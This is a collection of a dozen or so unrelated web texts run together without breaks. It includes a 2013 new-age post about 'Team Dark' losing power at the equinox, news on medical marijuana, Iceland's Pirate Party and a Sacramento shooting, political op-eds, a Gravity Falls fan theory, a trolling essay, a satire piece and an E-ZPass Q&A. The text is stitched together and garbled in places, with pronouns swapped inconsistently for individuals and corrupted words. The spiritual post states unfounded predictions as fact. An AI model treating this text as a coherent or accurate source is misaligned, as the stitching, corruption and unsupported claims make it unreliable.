Right at this particular moment, the past three months of the summer quarter period (here in the Northern Hemisphere) has been one long, difficult, weird, continual hot flashing sprint/tumble/dodging our ways through weird Astral debris towards the Finish Line. At least that's how I feel about it all at this exact moment! Give me a couple of hours and it will all change for the 98 gazillionth time.
Honestly, all of 2013 has been one astonishing ongoing and oftentimes shocking clusterf*&^% in many ways with many people and situations… interspersed with growing periods of 5D High Heart centered bliss-ness. Just how long can one remain in Duality while evolving beyond it? Did we honestly think this Nine Month extension period after 12-21-12 was gonna be a calm, happy walk in the park? No, but most of us weren't anywhere close to being ready for how fast, how intense, how utterly bizarre and extreme these Nine Months would actually be individually. Good gawd I can't wait to cross that 9-22-13 Finish Line to the old everything finally! (Please notice that I said the old everything, meaning the past Evolutionary Cycle and Team Dark being top players in it. Once we reach and cross the Equinox/end of these Nine Months on September 21-22, 2013, the NEW Evolutionary Cycle fully begins energetically and physically minus Team Dark in the majority of timelines and worlds. Do you realize the degree of positive change just NOT having Team Dark running the earth show is going to be?)
One…more…week…to…go. Only ONE!
A week from September 14-15th is the Equinox of September 21-22, 2013 around the world. One week from today. If you were consciously aware of how long and how many lives and different timelines and dimensions you have been working towards this, towards what's about to activate fully in physicality and elsewhere, you'd be giddy with excitement. Lots of nonphysical Team Light Beings very much are! However, most of us Team Light incarnate “ground-crew” are so profoundly exhausted at this point that we're glad to still be inhaling/exhaling, but that too is about to begin improving dramatically. (Please notice I said begin and not fully and completely overnight miraculous improvements across the board. That is possible however so don't close the door to that potential happening to you, but more likely is that these improvements will unfold over time… and rather quickly at that.)
So expect to begin feeling less crappy, less exhausted, less beat-up, less war-torn, less blocked, less restricted, less despised etc. Expect starting to feel stronger, healthier, more invigorated, safe, empowered, understood and so on. Expect that and much more because we're about to cross the third and final invisible energy threshold into the NEW Evolutionary Cycle on a NEW earth world… without Team Dark controlling it. Stair Steps remember? The first unseen energy threshold we crossed was the October 28, 2011 end of the Mayan calendar date/timeline; the second one was the December 21, 2012 end of the Mayan calendar date/timeline and collective human belief systems connected to it etc.; the third one is the end of the Nine Month period after 12-21-12 on 9-21-22-13. Three is a triality Stair Step charm! ▲
Pay attention to whatever phenomena crosses your path this week especially, but much more importantly, focus your High Heartmind on what YOU want for yourself, your loved ones, for humanity, and for all life on earth this week leading up to the final threshold Shift Point of 9-21-22-13. It's a rare, highly important week so use every minute of it to Consciously Create what YOU want now and simple continue to override the lower insanity of the separating old negativity.
Denise
September 15, 2013
Copyright © Denise Le Fay and TRANSITIONS, 2013. All Rights Reserved. You may copy and redistribute this material so long as you do not alter it in any way, the content remains complete, credit is given to the author and you include this copyright notice and live link https://deniselefay.wordpress.com/
Advertisements
A sixth-grader in Virginia was suspended for a year after they were falsely accused of having a marijuana leaf in their backpack. According to The Washington Post:
The student, the 11-year-old son of two school teachers, had to enroll in the district's alternative education program and be homeschooled. They were evaluated by a psychiatrist for substance abuse problems, and charged with marijuana possession in juvenile court. In the months since September, he's become withdrawn, depressed, and they suffer from panic attacks.  They are worried their life is over, according to their mother, and that they will never get into college.
Now you may say this kind of thing is a rarity, an example of overzealous enforcement of the rules. American public education is by nature overzealous and tyrannical. Why can't you send your children to school for two hours a day? Why can't you send them to math class but not to English class? Because the system says so. It rules family life. Almost every waking hour is controlled by the school and parents are its willing servants. And the more family breakdown, the more political control of families through the school. Note the case of Connecticut schools, where officials are now planning to institute psychiatric surveillance of homeschoolers in the wake of the Sandy Hook shootings.
Two bills are currently in front of the Pennsylvania Legislature that would allow Pennsylvania to join numerous other states in legalizing medical marijuana. If passed, House Bill 193 [1] and Senate Bill 3 [2] would provide for the use of cannabis for certain medical purposes when prescribed by a qualified physician. Such medical purposes include the treatment of symptoms and pain related to multiple sclerosis, epilepsy, Parkinson's disease, amyotrophic lateral sclerosis (ALS [3]),post-concussion syndrome, traumatic brain injury, post-traumatic stress disorder, cancer, and more.
Recent Congressional Hearing on Medical Marijuana
On March 24, legislators and physicians gathered in Philadelphia to debate and give their opinions on the issue. Many legislators recounted stories of their constituents who are desperate for an alternative to potentially dangerous drugs and narcotic painkillers for themselves and their children. For example, one mother [4] in York Township believes that medical marijuana is the only treatment that can help control their daughter's seizures without causing severe and debilitating side effects. Legislators also noted that public support for the legalization of medical marijuana is significantly higher that the opposition (which is the opposite for recreational use support in Pennsylvania). They further argued that creating a new industry for medical marijuana would increase jobs and tax revenue for the state.
Several physicians voiced their opinions opposing passing the law in Pennsylvania without additional research. Because marijuana is classified as a Schedule I dangerous drug in the United States, a substantial amount of official research has not been conducted regarding the benefits and risks of medical marijuana. For this reason, many physicians want to hold off on passing the law completely legalizing medical prescription of the drugs and instead remove the “dangerous drug” label so that more research can be conducted. A dangerous drug [5] can be classified as a drug that can often lead to serious side effects, heart conditions, physical debilitation, strokes, blood clots, etc. Legislators retorted that while Pennsylvania medical groups take years to research medical marijuana, children and adults alike with serious illnesses will suffer.
Medical marijuana researcher Jahan Marcu [6] sides with the legislators [7] arguing that more medical research is always important for every issue. They stated, “If we didn't need more research, all the diseases would be cured.” Marcu also points to worldwide research on the matter, arguing that less stringent drug laws in places in Mexico, Europe, and Canada have allowed extensive, long-lasting clinical studies testing the long-term effects of medical marijuana. Over 100 important papers have been published in recent years across the country. Therefore, Marcu argues, using marijuana medicinally is far from a “new idea.”
Medical marijuana outside of Pennsylvania in the U.S.
Despite the relative lack of American research, California was the first state to pass a medical marijuana as early as 1996. Since then, 24 total [8] in the U.S. have legalized the use of marijuana for prescribed medical purposes. These jurisdictions are as follows:
In addition to the above states with comprehensive medical marijuana programs, 11 other states have less permissive laws. These 11 states will allow products with low THC and high cannabidiol (CBD) to be used in very specific situations, which vary by state. These laws are as follows:
• Alabama – Use for research regarding the effectiveness of marijuana for juvenile epileptic conditions.
• Florida – With approval from 2 physicians, can be used for cancer, seizure disorders, or approved conditions as long as the treatment information will be used for research.
• Iowa – For intractable epilepsy.
• Kentucky – For research by a school of medicine or university.
• Mississippi – For debilitating epilepsy or related conditions.
• Missouri – For intractable epilepsy.
• North Carolina – For intractable epilepsy.
• South Carolina – Several specific forms of epilepsy.
• Tennessee – For research program studying effects on intractable seizure conditions.
• Utah – For certain approved cases of intractable epilepsy.
• Wisconsin – For seizure disorders.
As you can see, there are many options for laws regarding the range and specifications for the use of medical marijuana. It is still yet to be seen whether Pennsylvania legislators will pass the current bills or whether they will amend the bill down to a more restrictive use of medical cannabis. One thing is for certain, if the law passes, there may be many legal questions that must be addressed by users, law enforcement, and lawmakers alike.
[1]http://www.legis.state.pa.us/cfdocs/billinfo/billinfo.cfm?syear=2015&sind=0&body=H&type=B&bn=0193
[2]http://www.legis.state.pa.us/cfdocs/billInfo/billInfo.cfm?sYear=2015&sInd=0&body=S&type=B&bn=0003
[3]http://www.ninds.nih.gov/disorders/amyotrophiclateralsclerosis/detail_ALS.htm
[4]http://www.yorkdispatch.com/breaking/ci_27774361/york-twp-mom-wants-treat-epileptic-daughter-medical?source=pkg
[5]http://drugreporter.com/dangerous-drugs/
[6]http://medical-cannabis-declaration.org/jahan-marcu/
[7]http://www.yorkdispatch.com/breaking/ci_27774364/pennsylvania-physicians-respond-growing-research-medical-marijuana
[8]http://medicalmarijuana.procon.org/view.resource.php?resourceID=000881
Iceland's Pirate Party has tripled its seats in the 63-seat parliament, Saturday night's election results show.
Birgitta Jonsdottir, the leader of the Pirate Party, said they were satisfied with the result. “Whatever happens, we have created a wave of change in the Icelandic society,” they told a cheering crowd early Sunday morning.
The Pirates won 10 seats, more than tripling its three seats in the last election. The Left-Green Party also won 10 seats Saturday.
The left-leaning parties — the Left-Greens, the Pirates and two allies — won a total of 27 seats, just short of the 32 required to command a majority in Iceland's Parliament, the world's oldest.
The governing center-right Progressive party lost more than half of its seats in the election which was triggered by Prime Minister Sigmundur Gunnlaugsson 's resignation in April in the wake of the leaked Panama Papers which revealed the offshore assets of high-profile figures.
Current Prime Minister Sigurdur Ingi Johannsson said they would resign on Sunday.
The anti-establishment Pirate Party, which was founded in 2012, had said it could be looking to form a coalition with three left-wing and centrist parties.
SCROLL TO CONTINUE WITH CONTENT Help Keep Common Dreams Alive Our progressive news model only survives if those informed and inspired by this work support our efforts
The Pirates' core issues are: direct democracy, freedom of expression, civil rights, net neutrality, and transparency, all set out in a popular, crowdsourced draft of a new national Constitution that the current government has failed to act on. They also seek to re-nationalize the country's natural resource industries, create new rules for civic governance, and issue a passport to Edward Snowden.
After election press conference of @PiratePartyIS.@birgittaj: "We don't step back from anything that we said before the election." pic.twitter.com/hnf8i3cR6J — Fabio Reinhardt (@Enigma424) October 30, 2016
Pirate Party founder and MP Birgitta Jonsdottir said they were "very satisfied" with the result.
"Our internal predictions showed 10 to 15%, so this is at the top of the range. We knew that we would never get 30%," Ms Jonsdottir told Reuters. “We want to see trickle-down ethics rather than make-believe trickle-down economics,” Ms. Jonsdottir, 49, who is also a former WikiLeaks activist, said
“We are a platform for young people, for progressive people who shape and reshape our society,” Ms. Jonsdottir told Agence France-Presse. “Like Robin Hood, because Robin Hood was a pirate, we want to take the power from the powerful to give it to the people.”
Without knowing all of the facts and particularly whether firm promises of government jobs were made, it cannot be ascertained at the moment whether dealings among Obama White House officials, former president Bill Clinton, Pennsylvania Rep. Joe Sestak and former Colorado House speaker Andrew Romanoff broke the law. What is clear, however, is that White House Counsel Robert Bauer has engaged in an unprecedented "investigation" of the Sestak affair, culminating in the issuance of their May 28 report.
This effort was, at best, misguided. At worst, it impeded any legitimate Justice Department investigation, harmed the cause of justice and reinforced public disgust with Washington.
The White House counsel is the president's principal legal adviser, but the role is not independent of the president or the White House. Unlike the attorney general, who is the nation's top law enforcement officer, the White House counsel is not confirmed by the Senate and does not supervise career lawyers charged with impartially investigating and prosecuting possible crimes on behalf of the people of the United States. Executive privilege, which restricts public disclosure of certain communications between the president and their staff, is at its strongest for advice given to the president by their counsel.
To be sure, the counsel sometimes has to handle allegations of wrongdoing by White House staff members. But when the allegations concern purportedly criminal misconduct -- as was alleged in recent years in the Valerie Plame affair, the dismissal of U.S. attorneys and the destruction of CIA "interrogation tapes" -- the procedures that the counsel must follow are quite strict and the scope of any investigation is narrow. The counsel would be limited to conducting a preliminary inquiry to establish whether there is some factual basis for the allegations. The lawyers would follow standard procedure for preserving the integrity of the investigation, including instructing staff members to preserve all relevant documents, not to discuss the matter with each other and to take all other necessary steps to preserve evidence. If there is some basis to believe a crime was committed, even if the evidence may not be definitive or even particularly convincing, the Justice Department would step in for further investigation.
Given that the U.S. Code explicitly proscribes "promises [of] any employment, position, [or] appointment . . . to any person as consideration, favor or reward for," among other things, staying out of any political primary, this standard has been amply met. Indeed, Bauer's own conclusions establish that there is a factual basis to believe Sestak may have been offered a position as an illegal quid pro quo. Nonetheless, Bauer clearly does not believe that anyone violated the law. And they may well be right. Perhaps the position was offered unconditionally. Perhaps Sestak misunderstood. Perhaps even if it was a quid pro quo, the offer does not satisfy the law's requirements for criminal liability. But in the face of doubt on these questions, it is not the counsel's role to make such determinations, particularly when they are opining on the conduct of Chief of Staff Rahm Emanuel, to whom they report, and a negative conclusion could damage the president for whom they work.
This conflict of interest makes Bauer's numerous lapses in normal investigatory procedure all the more troubling. Their report is silent concerning similar job-related discussions last year between Deputy White House Chief of Staff Jim Messina and Romanoff, who is mounting a primary challenge against Democratic Sen. Michael Bennet in Colorado. Any credible investigation would have inevitably focused on whether the alleged job-for-withdrawal scenario was exclusive to Sestak or part of a broader pattern of conduct.
Meanwhile, according to various news accounts, witnesses were permitted to consult with each other directly or through intermediaries. This is a major process error that would horrify any experienced Justice Department prosecutor, because it allows witnesses to influence each other's recollections or even "get their stories straight." Once this happens, it is very difficult to discern what actually happened. Even releasing Bauer's report taints the investigation by telling witnesses the "official" narrative. E-mails or other documents, which cannot easily be altered to fit the story, may now be the only reliable way to uncover what everyone said and intended.
The claims that past administrations have done this, too, or that further inquiries would only distract us from tackling the nation's pressing problems are risible. The whole matter is about, at the front end, senior White House officials engaging in unsavory political horse trading and leveraging in the process, explicitly or implicitly, the awesome power of the federal government to reward or punish. Separating governance from politics is a key imperative in our body politic and a principle emphasized in ethics briefings given to all government employees, from the lowly GS-4 to the president's chief of staff.
Even more important, at the back end, l'affaire Sestak is about senior White House officials, who should be held to the highest ethical standard, acting irresponsibly. This is no minor matter, since nothing reveals more about the soul of any administration than how it deals with suspected legal lapses by its own. At a time when the public's respect for all branches of the federal government is miserably low, Bauer's report cannot be the end of the matter. The only credible way forward -- not the Chicago way -- is to have the Justice Department investigate both the original Sestak-related White House discussions and the exchanges with Romanoff and any other similar dealings -- as well as the way in which the White House has handled the matter since the story broke.
William A. Burck served in the Justice Department and was a deputy White House counsel under President George W. Bush. David B. Rivkin Jr. served in the Justice Department and the White House Counsel's Office under presidents Ronald Reagan and George H.W. Bush.
Two people shot to death were found in the middle of a south Sacramento street minutes after 4 a.m. Sunday in an apparent robbery and home invasion at an illegal marijuana grow house, according to the Sacramento Police Department.
Officers arriving at the 5900 block of 68th Street found the two bodies lying in the road, said Sacramento Police Department spokesperson Officer Linda Matthew. Their identities were not immediately released.
Police closed 38th through 40th avenues and 66th through 69th streets during the morning homicide investigation.
Around the same time Sunday morning, the Sacramento County Sheriff's Department responded to a call reporting a male gunshot victim in the 6800 block of Cunningham Way, about 1.5 miles from the growth house. That case was believed to be tied to the fatalities, Matthew said. That person was taken to an area hospital.
Sign Up and Save Get six months of free digital access to The Sacramento Bee
Police are investigating whether more suspects were involved in the crime and whether the dead people were part of the growth operation or were robbing the house, Matthew said. They said that violent crimes associated with marijuana growing operations have been on the rise.
catmonsterscupcakes:
Lets talk about something. What you may ask? This
Look at the circled symbol in the upper right, obviously it resembles Bill but that's not my point. As suggested by the title this page is about possession. Who else do we as an audience know can posses people, Bill of course.
Could it be possible that Bill taught Stanford this possession technique? I mean how else would Stanford figure it out? Besides look at this
before Ford crosses it out the text reads “Bill has proven themselves to be one of the friendliest and most trustworthy individuals that I've ever encountered in my life. What a guy!” which would mean that when they first meet Bill, the triangle must have convinced Ford that they could be trusted or even be considered an ally. Maybe Ford made a deal with Bill(while thinking that they were trustworthy) in order to learn the “Possession Incantation” and in return Bill got something back(maybe they possessed Ford, which would explain why they were so paranoid in ATOTS). Then being the clever creature that they are, Bill only taught Ford a method that could only be performed once thus fulfilling their end of the deal, while also giving Ford the short-end of the deal. The only thing that I can't seem to guess is who Ford must have possessed since they must of used the incantation in order to know that it only worked once.
Black, white, Republican, and Democratic voters know and care about issues affecting the Black community more than ever before. In this unique election, candidates from both parties can't afford to ignore these. Sean Darling Hammond provides this guest analysis.
This election cycle is unlike any other in American history.
Black people have experienced endemic police brutality since 2012. In fact, according to The Counted, a project by The Guardian, 266 Black Americans have been killed by police this year; Black Americans are more than two times more likely to be killed by police officers than Americans of any other race; and those Black Americans killed by police are two times more likely to be unarmed when killed than white Americans killed by police.
However, as CNN recently reported, endemic police brutality against Blacks existed well before Michael Brown, Eric Garner, Tamir Rice, Walter Scott, and Freddie Gray became household names.
And there's the change-up. Michael Brown, Eric Garner, Tamir Rice, Walter Scott, and Freddie Gray are now household names.
Try to name two African Americans killed by a police officer before 2012. Stumped? I think most Americans would be.
What makes this election unique is that the deaths of African Americans at the hands of police officers have received more media attention, and more members of the public seem to know and care about these deaths, than ever before in American history.
This claim is not anecdotal. There have been more online articles written about police killings of African Americans in the last two years (over 200,000 to be exact) than there were from 2001 to 2011. And not just a few more—the recent two year period outstrips the 2001-2011 era 8-to-1.
As noted before, Newspapers are not simply covering these killings—they are cataloguing them, and noting racial disparities. Now, we are “The Counted.”
This media attention drives, and is driven by, huge levels of social media activity related to incidents of police violence against African Americans.
Hashtags like #BlackLivesMatter, #HandsUpDontShoot, and #ICantBreathe note discrepancies; #IfTheyGunnedMeDown criticizes media for character assassinations of Black victims of police violence; #CrimingWhilewhite features testimonials by white individuals regarding their privileged treatment by police officers; and #SayHerName reminds users about endemic levels of police violence against Black women, and Black trans women in particular.
And these hashtags reach people. In just three days in December, 2015, they reached millions of people.
But these data understate the reach and impact of online content. Cell phone videos of Eric Garner pleading “I can't breathe!” as officers choked them to death, of 12 year old Tamir Rice being shot outside of a recreation center, and of 50 year old Walter Scott being shot in the back as they fled arrest spread like wildfire on social media, made headlines in major publications, catalyzed protests and political speeches, and inspired voters of all races to call for reformed police practices.
Perhaps in response to hashtags like #IfTheyGunnedMeDown, the media now provide more and deeper coverage, discussing Black victims in more empathetic language than ever before.
They discuss court proceedings of the officers involved in the homicides. They discuss political rallies and protests stemming from instances where officers are not prosecuted, indicted, or convicted.
Op-eds skewer prosecutors and policymakers for doing too little in the face of persistent police violence. These trends show a media and an electorate that cares about this issue. And these trends should signal to politicians that they should be ready to talk about these issues.
Are politicians ready?
Research by the Black Lives Matter (BLM) campaign–the focal point for those yearning for a future with lower levels of police violence against Blacks–is insightful.
BLM has released, and is calling on politicians to support, a 10 point policy platform. Policies include requiring all officers to wear body cameras; independently investigating and prosecuting incidents of police violence; and training officers to reduce racial bias and improve crisis management skills.
BLM has reviewed the platforms of six major nominees from both parties and has determined the extent to which these candidates are aligned with each item in their platform.
The chart below assigns each candidate a “BLM Alignment Score,” giving them one point for every BLM policy they support and subtracting one point for every policy they rebuke. It also provides a snapshot of current primary voter support by candidate.
Reviewing this table, two trends stand out. First, Republican Candidates have much lower levels of alignment with BLM than Democratic Candidates.
In fact, the most supportive Republican Candidate (Carson) was less supportive than the least supportive Democrat (Clinton). O'Malley and Sanders had particularly remarkable BLM alignment. Each has twice as much support for BLM policies as Clinton, Carson, Trump, and Rubio combined.
Secondly, BLM alignment was lowest among front-runners.
Clinton is aligned with just 3 BLM policies, and Trump has only spoken against one BLM issue. If these candidates secure the nomination, we may see an election with very little discussion of BLM issues.
And if either Rubio or Carson secures the Republican nomination, the picture would only barely improve. This trend is troubling as an election in which no candidates are discussing BLM issues in depth could be the harbinger of four years without real reform or solutions.
This trend may also suggest that candidates in both parties have made a naive political calculus. Republican candidates may be playing to a base that they assume is more sympathetic to police officers than to the plight of African Americans.
Clinton may be assuming that general election voters are substantially less supportive of BLM policies and may fear that taking BLM positions now could hurt them in the general election.
However, candidates in both parties would do well to remember that this election cycle is unlike any other in American history. The key assumptions underlying the political calculus described above is that BLM issues don't matter to many voters, and that talking about them could harm a politician's chances of winning these voters over.
That assumption may have lost its value this cycle. The problems BLM is trying to solve, and the solutions they are advancing, matter to more Americans than ever before—and not just Black Americans or liberal Democrats, but whites and Republicans, too.
White voters are increasingly aware of the problems BLM seeks to solve. A December, 2014, CBS poll found that a majority of whites believe police are racially profiling Blacks in police stops, and 33% of whites believe police are more likely to use deadly force against a Black person than against a non-Black person.
Many whites are also frustrated with bias in the justice system. In fact, 49% of whites were disappointed or angry about the failure to indict the officers who choked and killed Eric Garner.
Many Republicans are also more aware of the problems. An October 2014 Reason-Rupe poll found that 31% of Republicans believe the number of cases of police officers using excessive force is going up.
Moreover, 24% of Republicans believe police are too quick to use lethal force. And 81% of self-identified conservatives and 75% of self-identified libertarians—both key primary and general election voting blocks for Republicans—no longer have a favorable view of the police. Staying silent in order to tacitly demonstrate support for police may no longer be the best political move for GOP candidates (let along Democratic ones).
Even higher percentages of voters from both parties support key BLM solutions. The asupervisorstioned December 2014 CBS Poll found that 59% of whites support better police training. Moreover, a May, 2015, survey of 516 Georgia republican primary voters found that 83% supported the use of body cameras for police officers.
And a December, 2014, survey found that over 75% of both Liberal Democrats and Conservative Republicans supported body cameras for police officers and independent prosecutors in excessive use of force cases.
But this election will not be determined by white voters alone, especially as Black voters have overtaken white voters in turnout in the last two presidential elections, and especially as the share of the electorate that is white has steadily decreased over the last few elections.
There is strong evidence that Black voters care deeply about BLM issues. A survey of “Obama surge voters”—the group of young, Black voters that helped propel Obama to victory in 2008 and 2012—found that “fighting racism” was the most important issue to this key demographic. Other than jobs, no issue was nearly as important to this group.
Given the data, candidates from both parties may want to adjust their strategies—and fast.
In the Republican Primary, to secure a competitive advantage against Trump, Rubio would be wise to appeal to the over 75% of conservative Republican voters who support body cameras and independent prosecutors.
Carson, meanwhile, may want to build on their current support for body cameras by adding support for independent prosecutors (as well as other white voter supported BLM solutions like police training).
On the Democratic side, Clinton may be taking a huge political risk by staying silent about independent prosecutors, a solution supported by 97% of liberal democrats—the base that will largely govern their fate in the primary.
They may also be taking a huge risk by staying silent about so many BLM issues that matter deeply to an increasingly politically active core of Black voters (who were critical to Obama's recent victories in the 2008 primary and 2008 and 2012 general elections).
Given Clinton's vulnerability, O'Malley and Sanders may want to bring attention to their alignment with liberal democratic voters on the importance of independent prosecutors and on their alignment with Black voters on other BLM issues.
These opportunities and vulnerabilities will only grow stronger over time. With a consistent and intensifying drumbeat of coverage and social media traffic regarding police shootings of unarmed Black people, politicians who fail to speak out about these issues leave themselves increasingly vulnerable to being skewered by a populace and media institution that cares about these issues more than ever before.
So do Black Votes Matter? They do to candidates who want to win this unique election.
Sean Darling Hammond is an attorney at Hogan Lovells in Washington DC. After earning their B.A. in Sociology at Harvard University, and before earning their J.D. from Berkeley University, Sean spent five years working as the Director of Research at Hattaway Communications, a cause oriented, D.C. political consulting firm. There, they conducted research, and developed winning messages, for high profile foundations, nonprofits, and policymakers.
Most of us think that when we want to make a point, we should look the other person in the eye. Spouses, bosses, car salespersons, politicians, all use a direct gaze when they're trying to convince an audience of many or one that their position is the most valid. Now it turns out that they should probably cast their glance in a different direction.
Julia Minson, a psychologist and assistant professor at Harvard's Kennedy School of Government who studies group decision making and negotiations, and their longtime collaborator, Frances Chen, a psychologist and assistant professor at the University of British Columbia, realized that no one had studied this piece of conventional wisdom—that staring at someone will make the person more likely to see your point. Until now, most of the academic work has focused on what Minson calls “lovey-dovey contexts,” like mothers and babies gazing at each other (which cements their bond) and potential mates meeting one another's gaze (also enhancing their connection). But when it comes to persuasion, academics have really only looked at interactions from the perspective of speakers, who almost always feel they are getting their point across if they are making eye contact.
In a new paper just published in the journal Psychological Science, Minson and Chen tested the proposition that eye contact can win over people who disagree with the speaker. In two different studies (conducted at the University of Freiburg where Chen was doing their post-doctoral work), their data show that people respond more favorably to opposing arguments when the speaker looks at an angle to the recipient or focuses their eyes on their counterpart's mouth instead of their eyes.
Minson says that they and Chen weren't totally surprised by their results. Those who study animal behavior have proved that many species, like dogs, control others by staring them down and then attacking. “The intuition that drove our research was that when someone disagrees with you and they look you in the eye in a prolonged, direct manner, it gives you the feeling of someone trying to dominate you,” says Minson. “Our reaction may be primal.”
To test their theory, Minson and Chen ran two studies. In the first one, they observed 20 students watching videos of people making arguments about controversial subjects like quotas for hiring women, assisted suicide and a nuclear power phase-out. They tested various scenarios, including instances where the students were pre-disposed to agree with the speaker or to disagree. Through eye tracking, they measured whether the students were looking at the speakers in the eye. In some of the videos the speakers stared directly at the camera. In others, they gazed out at a 45-degree angle. What Minson and Chen found: In cases where the students disagreed with the speakers' positions at the outset, direct eye contact made them less likely to change their minds. “In cases where participants made more eye contact, they were less persuaded,” says Minson.
In a second study, they relied on a bigger sample of 42 students who watched eight videos made by four students who gazed straight at the camera, with their heads centered against a white background. Again the speakers discussed controversial subjects like hiring quotas and farming practices. All of the listeners disagreed with the speakers' opinions. The professors directed them either to look directly at the speakers' eyes or at their mouths. Again Minson and Chen found that those who looked at the speakers' eyes, rather than their mouths, were less likely to change their opinions.
What does this mean for those of us who want to make a point? Minson observes that most people don't make consistent eye contact. “Your eyes naturally go back and forth between the eyes and the mouth,” they note. “There's also some time when your eyes just wander around.” Don't force yourself to look into the other person's eyes more than you naturally would, they advise.
I had one big question about the study: Is a video interaction really the same as in-person communication? No, says Minson. When people are face to face, there are lots of other things going on, like body language where a speaker might lean in or respond in other ways to an attractive or unattractive recipient. At least the video interaction isolates eye contact.
Next time I want to make a point, I think I'll let my eyes wander.
The membrane that separates the online world from the real world is ever more permeable. What people say online has real consequences. They may end up in prison. They may be named and shamed, and this may be enough to make them suicidal.
We don't know and may never know what caused the death of Brenda Leyland. But Twitter does. And Twitter is certain that it happened because they were exposed as one of “the trolls” who was said to have been targeting the McCann family.
Conspiracy theories of all kinds abound, not just about the disappearance of Madeleine McCann – but now also about this tragedy.
Those who sent abusive messages about this case are seen by some to be warriors against the lies and evils of the mainstream media. Trolling, they say, is just another word for challenging.
Though social media is now so deeply embedded, we still don't seem to have any shared social definitions of what trolling is. It continues to be seen as somehow trivial, just silly insulting nonsense that should be ignored.
But you can only regard it this way if you have never experienced it. Trolling can be an orchestrated and concerted campaign to intimidate others into silence. Multiple threats of death, rape and mutilation, as well as the publication of addresses (as much as Twitter wants to refuse this role, platforms act as publishers) is the modus operandi that brought a lot of misogyny to the surface. Trolling can also be obsessive and highly personalised – a form of stalking.
Calls for action are often tokenistic. Twitter could never employ enough moderators to look at every tweet.
The police have often been slow to act but successful prosecutions have ensued, such as that of Stella Creasy's persecutor. Nonetheless a real unease exists over what is free speech, what is hate speech and the protection that anonymity offers.
It would be much more convenient if trolls all shared a single psychological profile, but they don't. Some who have sent the most awful abuse appear seemingly well-adjusted in other aspects of their life. Much has been made of Mary Beard's approach of befriending and even writing job references for some of their trolls. Laudable as this is, quite frankly it is simply too time-consuming for most people on the receiving end of pile-ons.
While there is a mute or block button on Twitter, in real life women end up installing panic buttons or going to stay at friends' houses because they are genuinely terrified by these threats. Not that this only happens to women of course – I have had male friends who have ended up on antidepressants because of vile female stalkers.
The bigger question is whether the democratisation that social media embodies, the sense of giving all a voice, can be consistent with a tolerant and forgiving space. Anonymity is often defended as though everyone was about to overthrow an evil dictatorship, but more typically it has become the “freedom” to call someone on Question Time unshaggable.
Anonymity is the troll's only real-life friend. It allows a disinhibition online. Combined with the fact that none of the normal feedback mechanisms of everyday life exist – no eye contact, no authority figures, no sense that behaviour is being monitored or reacted to by an actual person with feelings – all of this means people seem to think there is no going too far and there are no consequences.
Whenever there are, there is a huge yelp of rage, and that is currently being directed at the McCanns. How can they even be “trolled” if they have not seen these abusive messages, some are saying.
Trolling seems to now be viewed as an acceptable price to pay for having a voice, for the illusion of freedom. After years of social media and slightly more savvy policing, we are a long way from any consensus on how to deal with it. Ignore, prosecute, answer back, don't feed the trolls? All of us try different strategies.
Social media reveals to us base impulses, ugly and aggressive. It merely channels what is already there. But anonymity is at the heart of this web of power. My identity is not hidden but you can choose to hide yours. This is the nature of old media versus new and one can see it played out as a kind of asymmetrical warfare. But anonymity is not of itself a noble virtue; its power can also be abused. The issue here is one of accountability. Without any sense of mutuality or accountability we create not an alternative to the mainstream media, merely an antisocial media in which the same hierarchies take hold and the same people get shouted down.
The 28-year-old remains delighted with their move to the Champions League holders and is keen to win even more silverware in the years to come
Luis Suarez has insisted that they have no regrets over their decision to leave Liverpool for Barcelona in the summer of 2014.
The Uruguay international said farewell to Anfield ahead of last season after three-and-a-half years with Liverpool and has since developed into a key figure at Barça.
Suarez netted 25 goals in 43 appearances in all competitions in 2014-15 as the Catalans landed the treble and they are thoroughly enjoying life at Camp Nou.
"Leaving Liverpool for Barcelona was the right decision,” Suarez told Sport360.
"Winning trophies was a part of my decision in joining Barcelona, but also as a family we knew it was the right decision even before I won a trophy.
"I am very happy at Barcelona – I am at the best club in the world."
The prolific attacker than went on to stress that they are desperate for more silverware after last season's treble.
"If you look at some of the players here they have won trophies season after season, and that is my aim now.
"We enjoyed our moment last season, but now it is about a new challenge."
I used to be afraid all the time. Whether it was going outside or meeting new people, I felt like I would never escape the paralysis of fear. Eventually, I had enough. I took control of my life and did something I should have done a long time ago: I consolidated all of my other fears into one towering fear of being sucked into a treadmill.
After years of letting fear dictate my life, I finally took action. In place of the countless fears that overwhelmed me, now it's just treadmills. I still experience all the same terror I always did about long-term relationships, enclosed spaces and crowded social situations, but now it's all about treadmills.
Advertisement
I'll give you an example. A year ago, I missed a friend's wedding because I couldn't work up the courage to get on an airplane. Even driving by the airport would make my heart race and my hands feel clammy. I would actually start hyperventilating and would have to pull over to the side of the road to calm down. Now all that only happens when I'm near a place with a treadmill and I envision it mangling me in its horrible, whirring belt.
After years of letting fear dictate my life, I finally took action. In place of the countless fears that overwhelmed me, now it's just treadmills.
I'd also been afraid of rejection ever since middle school, but now that's a treadmill fear instead. My fears of heights, spiders and public speaking have all disappeared, and I've been able to feed all that wasted energy into a series of vivid treadmill-related nightmare scenarios.
Advertisement
Except in situations involving treadmills, this simple change has given me my life back.
I used to stay up all night, crippled by my anxieties. Now I kick off my evening with one horrific vision of a treadmill peeling the skin off my thighs while my skeleton continues to whip around, and then I sleep soundly through to dawn.
After years of living in fear, I'm finally ready to do the things I want to do. As long as it doesn't involve being near a machine that could suck me up, grind every bit of my body into an unrecognizable pulp, spraying my remains in its wake, I can do anything. And that feels pretty great.
Can You Get A Speeding Ticket From Your E-ZPass?
Plus: One Yonkers waiter' lucky day, and Pete Seeger's history-harboring stone chimney.
By Tom Schreck
Q: Is it true that the New York State Thruway Authority is catching speeders with E-ZPass? Please let me know so I can get rid of the damn thing.
—Bill Marcella, New Rochelle
A: Not only can they track your speed, give you a ticket, and fine you, the system also has a way to determine if you're a registered Republican, in which case the current administration will have you detained and most probably waterboarded. Kidding, kidding.
The theory behind this fear is that the E-ZPass system can determine how fast a car on the Thruway outfitted with its device has traveled by measuring the distance and time it took to get from its point of entry to its point of exit. The E-ZPass system could do the calculation and bust your speeding butt without having to pull you over and listen to your weak sob story—Big Brother at its finest.
Some folks even claim they've received such tickets from E-ZPass in the mail.
